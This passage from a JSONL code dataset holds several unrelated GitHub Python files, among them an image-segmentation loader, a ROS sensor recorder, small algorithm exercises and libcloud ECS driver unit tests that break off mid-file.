full_labels.append(pngs)\r\n\r\n self.img_filename = img_paths\r\n self.label = full_labels\r\n self.labeli = Label_img_path\r\n self.img_size = img_size\r\n\r\n def __getitem__(self, index):\r\n img = Image.open(self.img_filename[index])\r\n img = img.convert('RGB')\r\n img = img.resize((self.img_size, self.img_size)) \r\n \r\n # Read Labels\r\n mask = np.zeros((self.img_size, self.img_size))\r\n mask = Tomask(self.label[index], self.labeli) \r\n\r\n #with open('{}_.txt'.format(index), 'w') as fw:\r\n # for i in mask:\r\n # for j in i:\r\n # fw.write(str(j) + ' ')\r\n # fw.write('\\n')\r\n # fw.close\r\n\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n mask = torch.from_numpy(mask)\r\n return img, mask# shape of img, labels like: [h, w, c], [h, w, labels]\r\n def __len__(self):\r\n return len(self.img_filename)\r\n\r\n\r\n","repo_name":"chunish/face_parsing_map_segment","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38897559525","text":"import time\n\nfrom common import ComponentBase, Scan, action, TabularMeasurements2M\nfrom common.save import DataSaver\nfrom common.units import Q_\nfrom common.traits import DataSet as DataSetTrait\nfrom dummy import DummyManipulator, DummyContinuousDataSource, DummyLockIn\nfrom pathlib import Path\nfrom traitlets import Instance, Int\nfrom pint import Quantity\nfrom common.units import ureg\nimport thz_context # important for unit conversion\n\n\"\"\"\nExample table measurement with two manipulators\n\"\"\"\n\n\nclass AppRoot(TabularMeasurements2M):\n currentData = DataSetTrait(read_only=True).tag(\n name=\"Time domain\",\n axes_labels=[\"Time\"],\n data_label=\"Amplitude\",\n is_power=False)\n\n dataSaver = Instance(DataSaver)\n\n nMeasurements = Int(1, min=1).tag(name=\"No. of measurements\", priority=99)\n\n def __init__(self, objectName=None, loop=None):\n super().__init__(objectName=\"PI tabular measurements\",\n loop=loop)\n\n self.dataSaver = DataSaver(objectName=\"Data Saver\")\n\n pi_stage = DummyManipulator()\n pi_stage.objectName = \"PI C-863 DLine\"\n pi_stage.setPreferredUnits(ureg.ps, ureg.ps / ureg.s)\n\n self.TimeDomainScan = Scan(objectName=\"TimeDomainScan\")\n self.TimeDomainScan.manipulator = pi_stage\n self.TimeDomainScan.dataSource = DummyLockIn()\n self.TimeDomainScan.dataSource.objectName = \"SR830 dummy\"\n\n self.TimeDomainScan.continuousScan = True\n self.TimeDomainScan.minimumValue = Q_(1250, \"ps\")\n self.TimeDomainScan.maximumValue = Q_(1315, \"ps\")\n self.TimeDomainScan.overscan = Q_(3, \"ps\")\n self.TimeDomainScan.step = Q_(0.05, \"ps\")\n self.TimeDomainScan.positioningVelocity = Q_(30, \"ps/s\")\n self.TimeDomainScan.scanVelocity = Q_(1.6, \"ps/s\")\n self.TimeDomainScan.retractAtEnd = True\n\n self.dataSource = self.TimeDomainScan\n\n manipulator1 = DummyManipulator()\n manipulator1.setPreferredUnits(ureg.mm, ureg.mm / ureg.s) # added JanO 22.1.2019\n manipulator1.objectName = \"PI C-863 1\"\n self.manipulator1 = manipulator1\n self.positioningVelocityM1 = Q_(4, \"mm/s\")\n self.scanVelocity = Q_(4, \"mm/s\")\n self.manipulator1.set_limits(min_=Q_(-15, \"mm\"), max_=Q_(110, \"mm\"))\n\n manipulator2 = DummyManipulator()\n manipulator2.setPreferredUnits(ureg.mm, ureg.mm / ureg.s)\n manipulator2.objectName = \"PI C-863 2\"\n self.positioningVelocityM2 = Q_(4, \"mm/s\")\n self.manipulator2 = manipulator2\n # self.manipulator2.set_limits(min_=Q_(-15, \"mm\"), max_=Q_(15, \"mm\"))\n\n self.dataSaver.registerManipulator(self.manipulator1, \"Position1\")\n self.dataSaver.registerManipulator(self.manipulator2, \"Position2\")\n self.dataSaver.registerObjectAttribute(self, \"currentMeasurementName\", \"currentTableEntry\")\n self.dataSaver.fileNameTemplate = \"{date}-{name}-{currentTableEntry}-{Position1}-{Position2}\"\n self.dataSaver.set_trait(\"path\", Path(r\"\"))\n self.TimeDomainScan.addDataSetReadyCallback(self.dataSaver.process)\n self.TimeDomainScan.addDataSetReadyCallback(self.setCurrentData)\n self._backAndForth = True\n\n def setCurrentData(self, dataSet):\n self.set_trait(\"currentData\", dataSet)\n\n async def __aenter__(self):\n await super().__aenter__()\n return self\n\n @action(\"Take Tabular measurements\")\n async def takeTabularScan(self):\n self.set_trait(\"progress2\", 0) # progress trait changes added by Cornelius for additional progress Information\n for x in range(self.nMeasurements):\n dataset = await self.readDataSet()\n self.set_trait(\"progress2\", (x + 1) / self.nMeasurements)\n\n @action(\"Take No. of measurements\")\n async def takeSingleMeasurements(self):\n self.set_trait(\"progress\", 0) # progress trait changes added by Cornelius for additional progress Information\n self.set_trait(\"progress2\", 0)\n for x in range(self.nMeasurements):\n dataset = await self.TimeDomainScan.readDataSet()\n self.set_trait(\"progress\", (x + 1) / self.nMeasurements)\n self.set_trait(\"progress2\", (x + 1) / self.nMeasurements)\n\n @action(\"Stop\")\n async def stop(self): # added by Cornelius to Stop both tabular scan and multiple measurements scan\n if not self._activeFuture:\n if not self.TimeDomainScan._activeFuture:\n return\n self.TimeDomainScan._activeFuture.cancel()\n return\n self._activeFuture.cancel()\n\n async def __aexit__(self, *args):\n await super().__aexit__(*args)\n","repo_name":"Owlbearpig/taipan","sub_path":"example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7091631741","text":"input = \"11\t11\t13\t7\t0\t15\t5\t5\t4\t4\t1\t1\t7\t1\t15\t11\"\n\nbanks = [int(x) for x in input.split()]\nsnapshots = set()\nsnapshots.add(str(banks))\n\nlenBanks = len(banks)\n\nloopSize = 0\nloopStarted = False\nsnapshotToRemember = \"\"\n\ntoDistribute = 0\ni = 0\nwhile True:\n\ti = banks.index(max(banks))\n\n\ttoDistribute = int(banks[i])\n\tbanks[i] = 0\n\t\n\twhile toDistribute > 0:\n\t\ti += 1\n\t\tif i == lenBanks:\n\t\t\ti = 0\n\t\tbanks[i] += 1\n\t\ttoDistribute -= 1\n\n\tsnapshot = str(banks)\n\n\tif snapshot in snapshots and not loopStarted:\n\t\tsnapshotToRemember = snapshot\n\t\tloopStarted = True\n\t\tcontinue\n\n\tif loopStarted:\n\t\tloopSize += 1\n\n\tif snapshot == snapshotToRemember:\n\t\tbreak # we're done here\n\n\tsnapshots.add(str(banks))\n\nprint(loopSize)","repo_name":"jpparent/AoC2017","sub_path":"06-2.py","file_name":"06-2.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7569017912","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nn,m = map(int,input().split())\ngraph = []\nfor i in range(n):\n a = list(input())[:-1]\n graph.append(list(map(int,a)))\nvisited =[[0 for _ in range(m)] for _ in range(n)]\n\ndx = [1,-1,0,0]\ndy = [0,0,1,-1]\n\n\ndef bfs(graph,visited,sx,sy):\n global n\n global m\n queue = deque()\n queue.append((sx,sy))\n visited[sx][sy] = 1\n while queue:\n x,y = queue.popleft()\n for i in range(4):\n nx,ny= x+dx[i],y+dy[i]\n if 0<=nx 0 and charlist[i] == charlist[i - 1]:\n continue\n temp = self.Permutation(''.join(charlist[:i]) + ''.join(charlist[i + 1:]))\n for j in temp:\n pStr.append(charlist[i] + j)\n return pStr\n\n","repo_name":"buppter/algorithms","sub_path":"TargetOffer/字符串的排列.py","file_name":"字符串的排列.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"28464284302","text":"import json\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\ndef load_data(paths):\n data = []\n for p in paths:\n with open(p, 'r') as f:\n data += json.load(f)\n return [{'bot': d['bot'], 'user': d['user']} for d in data]\n\nfolder_path = 'MMDS/1' \nfile_list = []\n\nfor filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename).replace('\\\\', '/')\n file_list.append(file_path)\ndf = load_data(file_list)\ndf = pd.DataFrame(df)\ny = df['bot'].astype('int')\nX = pd.get_dummies(df['user'])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\nmodel = xgb.XGBClassifier()\nmodel.fit(X_train, y_train)\n\npredictions = model.predict(X_test)\n\naccuracy = accuracy_score(y_test, predictions)\n","repo_name":"naz2001r/MMDB_HW_2023","sub_path":"Xgboost.py","file_name":"Xgboost.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36363555477","text":"import torch.nn as nn\n\ndef get_activation_function(name):\n if name is None or name == \"identity\":\n return nn.Identity()\n if name == \"relu\":\n return nn.ReLU()\n if name == \"relu6\":\n return nn.ReLU6()\n if name == \"lrelu\":\n return nn.LeakyReLU()\n if name == \"prelu\":\n return nn.PReLU()\n if name == \"selu\":\n return nn.SELU()\n if name == \"celu\":\n return nn.CELU()\n if name == \"softmax\":\n return nn.Softmax(dim=0)\n","repo_name":"SoliareofAstora/space_memory","sub_path":"components/model/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74506621866","text":"import os\nimport appTemplate\nfrom typing import List\n\n\nclass Tail(appTemplate.AppTemplate):\n def __tail(self, lines: List[str], number: int = 10) -> List[str]:\n result: List[str] = []\n for i in range(len(lines) - 1, -1, -1):\n try:\n if number > 0:\n result.append(lines[i])\n number -= 1\n else:\n break\n except IndexError:\n break\n result.reverse()\n return result\n\n def exec(self,\n raw_args: List[str],\n stdin: List[str],\n stdout: List[str]) -> int:\n\n args = []\n for i in raw_args:\n expanded = self.gen_wildcard_matches(i)\n if expanded == []:\n args.append(i)\n else:\n args.extend(expanded)\n\n result = []\n number = 10\n if len(args) == 1 and os.path.isfile(args[0]):\n # passing file from argument with no options\n with open(args[0], \"r\") as file:\n lines = file.readlines()\n result = self.__tail(lines, number)\n\n elif len(stdin) > 1:\n # passing file from stdin.\n if len(args) == 2 and args[0] == \"-n\":\n try:\n number = int(args[1])\n except ValueError:\n return 1\n elif len(args) == 0:\n number = 10\n else:\n return 1\n result = self.__tail(stdin.copy(), number)\n\n elif len(args) == 3 and args[0] == \"-n\":\n # passing file from argument\n try:\n number = int(args[1])\n except ValueError:\n stdout.clear()\n return 1\n with open(args[2], \"r\") as file:\n lines = file.readlines()\n result = self.__tail(lines, number)\n else:\n stdout.clear()\n return 1\n stdout.clear()\n stdout.extend(i if i and i[-1] != \"\\n\" else i[:-1] for i in result)\n return 0\n\n\n__app__ = Tail()\n","repo_name":"chriszhang1/comp0010_shell","sub_path":"src/app/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16421121963","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame as DF \n\ndef main():\n data = {\n 'unit price' : [1000, 280 , 900],\n 'number' : [ 25, 120, 30]\n }\n df =DF(data, index=['store1', 'store2', 'store3'])\n display(df)\n df['total price']=df['unit price']*df['number']\n display(df)\n df = df.sort_values(by='total price', ascending=False)\n display(df[0:2])\n \n \n \nif __name__ == '__main__':\n main()\n","repo_name":"asdfjklec/HW7_KMH","sub_path":"Q3/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7287041352","text":"import turtle\n\npen = turtle.Pen()\npen.speed(10)\npen.pencolor('pink')\npen.pensize(5)\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('black')\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('red')\npen.circle(50)\npen.penup()\npen.left(90)\npen.forward(50)\npen.left(90)\npen.forward(50)\npen.pendown()\npen.pencolor('green')\npen.circle(50)\npen.penup()\npen.forward(80)\npen.pendown()\npen.pencolor('yellow')\npen.circle(50)\n\n# Write text\npen.penup() # Lift the pen\npen.forward(160) # Move the pen to a specified coordinate\npen.pendown() # Put down the pen\npen.write('mememe', align='center', font=('youyouyou', '20')) \npen.penup() # Lift the pen\npen.forward(150) # Move the pen to a specified coordinate\npen.pendown() # Put down the pen\npen.write('222', align='center', font=('666', '20'))\n\nturtle.done()\n","repo_name":"whr4869/Boring_code","sub_path":"小海龟画图/五环.py","file_name":"五环.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29374558879","text":"#!/usr/bin/env python3\nimport sys\nfrom time import gmtime, strftime\nimport rospy\nimport rosbag\nfrom dare_sensors.msg import EEGMessage\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nimport csv\nimport cv2\nimport numpy as np\nimport os\n\nclass Subscriber:\n\n def __init__(self, directory_path):\n \n print(directory_path)\n self.directory_path = directory_path\n self.data_source=\"EEG\"\n #initialize csv for writing eeg data\n \n \n self.muse_csv_file = open(self.directory_path+\"/raw_eeg.csv\", \"w\")\n self.muse_csv_writer = csv.writer(self.muse_csv_file)\n self.muse_csv_writer.writerow([\"timestamp\", \"TP9\", \"AF7\", \"AF8\", \"TP10\"])\n\n #initialize csv for writing eeg data\n self.plux_csv_file = open(self.directory_path+\"/plux.csv\", \"w\")\n self.plux_csv_writer = csv.writer(self.plux_csv_file)\n self.plux_csv_writer.writerow([\"timestamp\", \"ECG\", \"GSR\"])\n\n\n #initialize the video writers\n self.rgb_video_filename1 = self.directory_path + \"/video_1.avi\"\n self.rgb_codec1 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps1 = 30.0\n self.rgb_writer1 = None\n\n self.rgb_video_filename2 = self.directory_path + \"/video_2.avi\"\n self.rgb_codec2 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps2 = 30.0\n self.rgb_writer2 = None\n\n self.rgb_video_filename3 = self.directory_path + \"/video_3.avi\"\n self.rgb_codec3 = cv2.VideoWriter_fourcc(*'XVID')\n self.rgb_fps3 = 30.0\n self.rgb_writer3 = None\n\n #rosbag to store the depth. conversion to xvid format might result in loss of infromation. \n self.depth_bag = rosbag.Bag(self.directory_path + \"/depth_data.bag\", 'w')\n\n #create the subscribers\n #subscribers for realsense cam1\n self.depth_sub_cam1 = rospy.Subscriber('camera_1/depth/image_raw', Image, self.depth_callback_cam1)\n self.rgb_sub_cam1 = rospy.Subscriber('camera_1/rgb/image_raw', Image, self.rgb_callback_cam1)\n\n #subscribers for realsense cam2 \n self.depth_sub_cam2 = rospy.Subscriber('camera_2/depth/image_raw', Image, self.depth_callback_cam2)\n self.rgb_sub_cam2 = rospy.Subscriber('camera_2/rgb/image_raw', Image, self.rgb_callback_cam2)\n\n #subscribers for logitech cam3\n self.rgb_sub_cam3 = rospy.Subscriber('camera_3/rgb/image_raw', Image, self.rgb_callback_cam3) \n\n self.muse_subscriber = rospy.Subscriber(\"/eeg_stream\", EEGMessage, self.muse_listener_callback)\n \n self.plux_subscriber = rospy.Subscriber(\"/plux_topic\", String, self.plux_listener_callback)\n \n \n def depth_callback_cam1(self, msg):\n self.depth_bag.write('camera_1/depth/image_raw', msg)\n\n def depth_callback_cam2(self, msg):\n self.depth_bag.write('camera_2/depth/image_raw', msg)\n\n def rgb_callback_cam1(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer1 is None:\n self.rgb_writer1 = cv2.VideoWriter(self.rgb_video_filename1, self.rgb_codec1, self.rgb_fps1,(rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer1.write(rgb_image)\n \n def rgb_callback_cam2(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer2 is None:\n self.rgb_writer2 = cv2.VideoWriter(self.rgb_video_filename2, self.rgb_codec2, self.rgb_fps2,(rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer2.write(rgb_image)\n\n def rgb_callback_cam3(self, msg):\n rgb_image = np.frombuffer(msg.data, dtype=np.uint8).reshape(msg.height, msg.width, 3)\n if self.rgb_writer3 is None:\n self.rgb_writer3 = cv2.VideoWriter(self.rgb_video_filename3, self.rgb_codec3, self.rgb_fps3, (rgb_image.shape[1], rgb_image.shape[0]))\n self.rgb_writer3.write(rgb_image)\n\n def muse_listener_callback(self, msg):\n rospy.loginfo('I heard: \"%s\"' % msg)\n print(msg)\n self.muse_csv_writer.writerow([msg.timestamp, msg.tp9, msg.af7, msg.af8, msg.tp10])\n self.muse_csv_file.flush()\n\n\n def plux_listener_callback(self, msg):\n rospy.loginfo('Received message from bioplux: \"%s\"' % msg.data)\n msg_tkns = str(msg.data).split(\",\")\n self.plux_csv_writer.writerow([msg_tkns[0], msg_tkns[1], msg_tkns[2]])\n self.plux_csv_file.flush()\n\n def close_resources(self):\n if self.muse_csv_file is not None:\n self.muse_csv_file.close()\n if self.plux_csv_file is not None:\n self.plux_csv_file.close()\n self.depth_bag.close()\n if self.rgb_writer1 is not None:\n self.rgb_writer1.release()\n if self.rgb_writer2 is not None:\n self.rgb_writer2.release()\n if self.rgb_writer3 is not None:\n self.rgb_writer3.release()\n\n def __del__(self):\n pass\n\ndef main():\n PATH = sys.argv[1]\n print(PATH)\n rospy.init_node(\"global_sensor_listener\", anonymous=True)\n subscriber = Subscriber(PATH)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n pass\n subscriber.close_resources()\n \n\n\n\nif __name__ == '__main__':\n main()","repo_name":"heracleia/bioplux-muse-ros2","sub_path":"ros1/subscribers/global_listener.py","file_name":"global_listener.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11838448720","text":"#!/usr/bin/python\n\nimport sys\nimport getopt\nimport CodeChiffreSonFromWord\n \nlastTenWords = []\n \ndef hasManySameCharacter(word1, word2):\n if len(word1) > len(word2):\n word = word1\n word1 = word2\n word2 = word\n i = 0\n same = 0.0\n for c in word1:\n if c == word2[i]:\n same = same + 1.0\n i = i + 1\n if same != 0 and same / float(len(word2)) > 0.5:\n return True\n return False \n \ndef isDuplicate(newWord):\n word = \"\"\n if len(lastTenWords) == 100 or newWord == \"\":\n word = lastTenWords.pop(0)[0]\n numberOfWord = CodeChiffreSonFromWord.getNumber(word)\n if not numberOfWord:\n return \"\"\n for idx, oldWord in enumerate(lastTenWords):\n numberOfOldWord = CodeChiffreSonFromWord.getNumber(oldWord[0])\n if int(numberOfWord) == int(numberOfOldWord) and hasManySameCharacter(word, oldWord[0]) == True:\n if oldWord[0].endswith(\"er\") == True:\n word = oldWord[0]\n lastTenWords[idx] = (lastTenWords[idx][0], True)\n i = 0\n while i < len(lastTenWords):\n if lastTenWords[i][1] == True:\n lastTenWords.pop(i)\n else:\n i += 1\n if CodeChiffreSonFromWord.getNumber(newWord) != \"\":\n lastTenWords.append((newWord, False))\n return word\n \ndef parseFile(fileName):\n inputfile = open(fileName)\n for line in inputfile:\n word = isDuplicate(line.rstrip('\\n').replace(\" \", \"\"))\n if word != \"\":\n print(word + \" -> \" + CodeChiffreSonFromWord.getNumber(word))\n while len(lastTenWords) != 0:\n word = isDuplicate(\"\")\n if word != \"\":\n print(word + \" -> \" + CodeChiffreSonFromWord.getNumber(word))\n return 1\n \nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n parseFile(sys.argv[1])\n","repo_name":"Joyas/Code-chiffre-son","sub_path":"removeDuplicate.py","file_name":"removeDuplicate.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23694572612","text":"import sys\nimport unittest\n\nfrom libcloud.test import MockHttp, LibcloudTestCase\nfrom libcloud.utils.py3 import httplib\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.compute.base import (\n Node,\n NodeSize,\n NodeImage,\n NodeLocation,\n StorageVolume,\n VolumeSnapshot,\n NodeAuthPassword,\n)\nfrom libcloud.test.secrets import ECS_PARAMS\nfrom libcloud.compute.types import NodeState, StorageVolumeState\nfrom libcloud.test.file_fixtures import ComputeFileFixtures\nfrom libcloud.compute.drivers.ecs import ECSDriver\n\n\nclass ECSDriverTestCase(LibcloudTestCase):\n region = \"cn-qingdao\"\n zone = \"cn-qingdao-b\"\n image_id = \"ubuntu1404_64_20G_aliaegis_20150325.vhd\"\n\n def setUp(self):\n ECSMockHttp.test = self\n ECSDriver.connectionCls.conn_class = ECSMockHttp\n ECSMockHttp.use_param = \"Action\"\n ECSMockHttp.type = None\n\n self.driver = ECSDriver(*ECS_PARAMS, region=self.region)\n self.fake_size = NodeSize(\n \"ecs.t1.small\", \"ecs t1 small\", None, None, None, None, self.driver\n )\n self.fake_image = NodeImage(self.image_id, name=\"ubuntu 14.04 64bit\", driver=self.driver)\n self.fake_node = Node(\n id=\"fake-node1\",\n name=\"fake-node\",\n state=NodeState.RUNNING,\n public_ips=None,\n private_ips=None,\n driver=self.driver,\n )\n self.fake_volume = StorageVolume(\n id=\"fake-volume1\",\n name=\"fake-volume\",\n size=self.fake_size,\n driver=self.driver,\n )\n self.fake_snapshot = VolumeSnapshot(id=\"fake-snapshot1\", driver=self.driver)\n self.fake_location = NodeLocation(\n id=self.region, name=self.region, country=None, driver=self.driver\n )\n self.fake_instance_id = \"fake_instance_id\"\n self.fake_security_group_id = \"fake_security_group_id\"\n\n def test_list_nodes(self):\n # the test describes two nodes:\n # the first on a classic network and with public ip attached\n # the second on a vpc with an elastic ip attached\n vpc_ips = [None, \"10.163.197.74\"]\n eips = [\"\", \"114.215.124.73\"]\n nodes = self.driver.list_nodes()\n self.assertIsNotNone(nodes)\n self.assertEqual(2, len(nodes))\n for node, vpc_ip, eip in zip(nodes, vpc_ips, eips):\n self.assertEqual(\"iZ28n7dkvovZ\", node.name)\n self.assertEqual(\"i-28n7dkvov\", node.id)\n self.assertEqual(NodeState.PENDING, node.state)\n self.assertEqual(1, len(node.public_ips))\n self.assertEqual(\"114.215.124.73\", node.public_ips[0])\n self.assertEqual(1, len(node.private_ips))\n self.assertEqual(\"10.163.197.74\", node.private_ips[0])\n expected_extra = {\n \"image_id\": \"ubuntu1404_64_20G_aliaegis_20150325.vhd\",\n \"description\": \"\",\n \"instance_type_family\": \"ecs.t1\",\n \"zone_id\": \"cn-qingdao-b\",\n \"internet_charge_type\": \"PayByTraffic\",\n \"serial_number\": \"ca0122d9-374d-4fce-9fc0-71f7c3eaf1c3\",\n \"io_optimized\": \"false\",\n \"device_available\": \"true\",\n \"instance_network_type\": \"classic\",\n \"hostname\": \"iZ28n7dkvovZ\",\n \"instance_type\": \"ecs.t1.small\",\n \"creation_time\": \"2015-12-27T07:35Z\",\n \"instance_charge_type\": \"PostPaid\",\n \"expired_time\": \"2999-09-08T16:00Z\",\n }\n self._validate_extras(expected_extra, node.extra)\n vpc = {\n \"vpc_id\": \"\",\n \"vswitch_id\": \"\",\n \"private_ip_address\": vpc_ip,\n \"nat_ip_address\": \"\",\n }\n self._validate_extras(vpc, node.extra[\"vpc_attributes\"])\n eip_address = {\n \"allocation_id\": \"\",\n \"ip_address\": eip,\n \"internet_charge_type\": \"\",\n \"bandwidth\": None,\n }\n self._validate_extras(eip_address, node.extra[\"eip_address\"])\n self.assertIsNone(node.extra[\"operation_locks\"][\"lock_reason\"])\n\n def test_list_nodes_with_ex_node_ids(self):\n ECSMockHttp.type = \"list_nodes_ex_node_ids\"\n nodes = self.driver.list_nodes(ex_node_ids=[\"i-28n7dkvov\", \"not-existed-id\"])\n self.assertIsNotNone(nodes)\n\n def test_list_nodes_with_ex_filters(self):\n ECSMockHttp.type = \"list_nodes_ex_filters\"\n nodes = self.driver.list_nodes(ex_filters={\"ZoneId\": self.zone})\n self.assertIsNotNone(nodes)\n\n def _validate_extras(self, expected, actual):\n self.assertIsNotNone(actual)\n for key, value in iter(expected.items()):\n self.assertTrue(key in actual)\n self.assertEqual(\n value,\n actual[key],\n (\n \"extra %(key)s not equal, \"\n 'expected: \"%(expected)s\", '\n 'actual: \"%(actual)s\"' % {\"key\": key, \"expected\": value, \"actual\": actual[key]}\n ),\n )\n\n def test_create_node(self):\n ECSMockHttp.type = \"create_node\"\n name = \"test_create_node\"\n node = self.driver.create_node(\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-28ou0f3xa\",\n ex_description=\"description\",\n ex_internet_charge_type=\"PayByTraffic\",\n ex_internet_max_bandwidth_out=1,\n ex_internet_max_bandwidth_in=200,\n ex_hostname=\"hostname\",\n auth=NodeAuthPassword(\"password\"),\n ex_io_optimized=True,\n ex_system_disk={\n \"category\": \"cloud\",\n \"disk_name\": \"root\",\n \"description\": \"sys\",\n },\n ex_vswitch_id=\"vswitch-id1\",\n ex_private_ip_address=\"1.1.1.2\",\n ex_client_token=\"client_token\",\n )\n self.assertIsNotNone(node)\n\n def test_create_node_with_data_disk(self):\n ECSMockHttp.type = \"create_node_with_data\"\n self.name = \"test_create_node\"\n self.data_disk = {\n \"size\": 5,\n \"category\": self.driver.disk_categories.CLOUD,\n \"disk_name\": \"data1\",\n \"description\": \"description\",\n \"device\": \"/dev/xvdb\",\n \"delete_with_instance\": True,\n }\n node = self.driver.create_node(\n name=self.name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-28ou0f3xa\",\n ex_data_disks=self.data_disk,\n )\n self.assertIsNotNone(node)\n\n def test_list_sizes(self):\n sizes = self.driver.list_sizes()\n self.assertEqual(2, len(sizes))\n size = sizes[0]\n self.assertEqual(\"ecs.t1.xsmall\", size.id)\n self.assertEqual(\"ecs.t1.xsmall\", size.name)\n self.assertEqual(0.5, size.ram)\n self.assertEqual(1, size.extra[\"cpu_core_count\"])\n self.assertEqual(\"ecs.t1\", size.extra[\"instance_type_family\"])\n size = sizes[1]\n self.assertEqual(\"ecs.s2.small\", size.id)\n self.assertEqual(\"ecs.s2.small\", size.name)\n self.assertEqual(1.0, size.ram)\n self.assertEqual(2, size.extra[\"cpu_core_count\"])\n self.assertEqual(\"ecs.s2\", size.extra[\"instance_type_family\"])\n\n def test_list_locations(self):\n locations = self.driver.list_locations()\n self.assertEqual(9, len(locations))\n location = locations[0]\n self.assertEqual(\"ap-southeast-1\", location.id)\n self.assertIsNone(location.country)\n\n def test_create_node_without_sg_id_exception(self):\n name = \"test_create_node_without_sg_id_exception\"\n self.assertRaises(\n AttributeError,\n self.driver.create_node,\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n )\n\n def test_creat_node_paybytraffic_exception(self):\n name = \"test_create_node_paybytraffic_exception\"\n self.assertRaises(\n AttributeError,\n self.driver.create_node,\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-id1\",\n ex_internet_charge_type=\"PayByTraffic\",\n )\n\n def test_create_node_ex_system_disk_exception(self):\n name = \"test_creat_node_ex_system_disk_exception\"\n self.assertRaises(\n AttributeError,\n self.driver.create_node,\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-id1\",\n ex_system_disk=None,\n )\n\n def test_create_node_ex_private_ip_address_exception(self):\n name = \"test_create_node_ex_private_ip_address_exception\"\n self.assertRaises(\n AttributeError,\n self.driver.create_node,\n name=name,\n image=self.fake_image,\n size=self.fake_size,\n ex_security_group_id=\"sg-id1\",\n ex_private_ip_address=\"1.1.1.2\",\n )\n\n def test_reboot_node(self):\n ECSMockHttp.type = \"reboot_node\"\n result = self.driver.reboot_node(self.fake_node)\n self.assertTrue(result)\n\n def test_reboot_node_with_ex_force_stop(self):\n ECSMockHttp.type = \"reboot_node_force_stop\"\n result = self.driver.reboot_node(self.fake_node, ex_force_stop=True)\n self.assertTrue(result)\n\n def test_destroy_node(self):\n ECSMockHttp.type = \"destroy_node\"\n result = self.driver.destroy_node(self.fake_node)\n self.assertTrue(result)\n\n def test_ex_start_node(self):\n ECSMockHttp.type = \"start_node\"\n result = self.driver.ex_start_node(self.fake_node)\n self.assertTrue(result)\n\n def test_ex_stop_node(self):\n ECSMockHttp.type = \"stop_node\"\n result = self.driver.ex_stop_node(self.fake_node)\n self.assertTrue(result)\n\n def test_stop_node_with_ex_force_stop(self):\n ECSMockHttp.type = \"stop_node_force_stop\"\n result = self.driver.ex_stop_node(self.fake_node, ex_force_stop=True)\n self.assertTrue(result)\n\n def test_create_public_ip(self):\n ECSMockHttp.type = \"create_public_ip\"\n result = self.driver.create_public_ip(self.fake_instance_id)\n self.assertTrue(result)\n\n def test_list_volumes(self):\n volumes = self.driver.list_volumes()\n self.assertEqual(2, len(volumes))\n volume = volumes[0]\n self.assertEqual(\"d-28m5zbua0\", volume.id)\n self.assertEqual(\"\", volume.name)\n self.assertEqual(5, volume.size)\n self.assertEqual(StorageVolumeState.AVAILABLE, volume.state)\n expected_extras = {\n \"region_id\": \"cn-qingdao\",\n \"zone_id\": \"cn-qingdao-b\",\n \"description\": \"\",\n \"type\": \"data\",\n \"category\": \"cloud\",\n \"image_id\": \"\",\n \"source_snapshot_id\": \"\",\n \"product_code\": \"\",\n \"portable\": True,\n 